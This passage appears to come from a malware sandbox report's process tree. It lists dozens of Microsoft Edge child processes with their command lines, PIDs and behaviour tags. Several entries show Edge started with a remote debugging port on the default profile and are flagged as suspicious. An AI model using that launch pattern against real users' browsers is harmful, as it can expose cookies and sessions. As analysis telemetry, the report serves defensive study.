        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2888 /prefetch:2
        8⤵
        
        PID:5376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2332 /prefetch:2
        8⤵
        
        PID:6396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3520 /prefetch:2
        8⤵
        
        PID:5320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3904 /prefetch:2
        8⤵
        
        PID:5560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3912 /prefetch:2
        8⤵
        
        PID:5284
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3904 /prefetch:2
        8⤵
        
        PID:5260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,10979014700230672131,5163312065934014209,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2640 /prefetch:2
        8⤵
        
        PID:6064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
        8⤵
        
        PID:6100
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
        8⤵
        
        PID:5152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2344 /prefetch:8
        8⤵
        
        PID:5984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2348 /prefetch:2
        8⤵
        
        PID:6168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6300
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2352 /prefetch:2
        8⤵
        
        PID:6520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2296 /prefetch:2
        8⤵
        
        PID:6476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3620 /prefetch:2
        8⤵
        
        PID:2584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4260 /prefetch:2
        8⤵
        
        PID:1400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4444 /prefetch:2
        8⤵
        
        PID:2388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3884 /prefetch:2
        8⤵
        
        PID:1576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1755659783484214375,481759325719857769,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4744 /prefetch:2
        8⤵
        
        PID:4320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6696
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
        8⤵
        
        PID:5132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 /prefetch:3
        8⤵
        
        PID:5360
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
        8⤵
        
        PID:5176
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2744 /prefetch:2
        8⤵
        
        PID:5200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3120 /prefetch:2
        8⤵
        
        PID:5684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2580 /prefetch:2
        8⤵
        
        PID:1608
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5468
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2592 /prefetch:2
        8⤵
        
        PID:5604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3708 /prefetch:2
        8⤵
        
        PID:6084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3708 /prefetch:2
        8⤵
        
        PID:2188
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4184 /prefetch:2
        8⤵
        
        PID:5944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,13399730498004979902,8846212579351469967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4216 /prefetch:2
        8⤵
        
        PID:4536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
        8⤵
        
        PID:6216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,14003134387246133173,9061530922776797734,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
        8⤵
        
        PID:6200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
